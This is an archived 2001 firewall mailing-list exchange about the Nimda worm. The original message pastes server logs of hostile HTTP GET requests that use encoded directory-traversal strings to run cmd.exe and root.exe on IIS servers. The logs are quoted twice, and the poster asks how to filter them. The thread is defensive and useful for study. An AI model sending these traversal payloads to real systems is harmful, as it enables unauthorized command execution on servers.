Re: [FW1] New worm on the road?

hsanders Wed, 19 Sep 2001 17:03:28 -0700



It's all over the news. The W32/Nimda  worm (admin backwards). Feel free to read
all about it. It's caused massive headaches all day today.

http://www.cert.org/advisories/CA-2001-26.html




"Patrick Coomans" <[EMAIL PROTECTED]> on 09/18/2001 05:35:36 PM

To:   [EMAIL PROTECTED]
cc:    (bcc: Harley S. Sanders/BAIS/BAReston)

Subject:  [FW1] New worm on the road?




Since this evening I am experiencing massive attacks on HTTP (IIS oriented I
presume) from many different IP addresses.

They all look like:

GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
GET /scripts/root.exe?/c+dir HTTP/1.0
GET /MSADC/root.exe?/c+dir HTTP/1.0
GET /MSADC/root.exe?/c+dir HTTP/1.0
GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0
GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir

HTTP/1.0
GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir

HTTP/1.0
GET
/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir

HTTP/1.0
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0


Is anyone aware that this is some new kind of worm?
Now my FW1 question: can I create a HTTP resource (secure server) that blocks
all requests that e.g. have a .EXE in it ?  Or would that slow my FW1's down to
much?

Any other suggestions for good products that can do HTTP content inspection and
that cooperate or can co-exist with fw1 ?


Thanks,
Patrick

Since this evening I am experiencing massive attacks on HTTP (IIS oriented I presume) from many different IP addresses.

They all look like:

GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/root.exe?/c+dir HTTP/1.0
GET /MSADC/root.exe?/c+dir HTTP/1.0
GET /MSADC/root.exe?/c+dir HTTP/1.0
GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0

Is anyone aware that this is some new kind of worm?

Now my FW1 question: can I create a HTTP resource (secure server) that blocks all requests that e.g. have a .EXE in it ? Or would that slow my FW1's down to much?

Any other suggestions for good products that can do HTTP content inspection and that cooperate or can co-exist with fw1 ?

Thanks,

Patrick

Re: [FW1] New worm on the road?

Reply via email to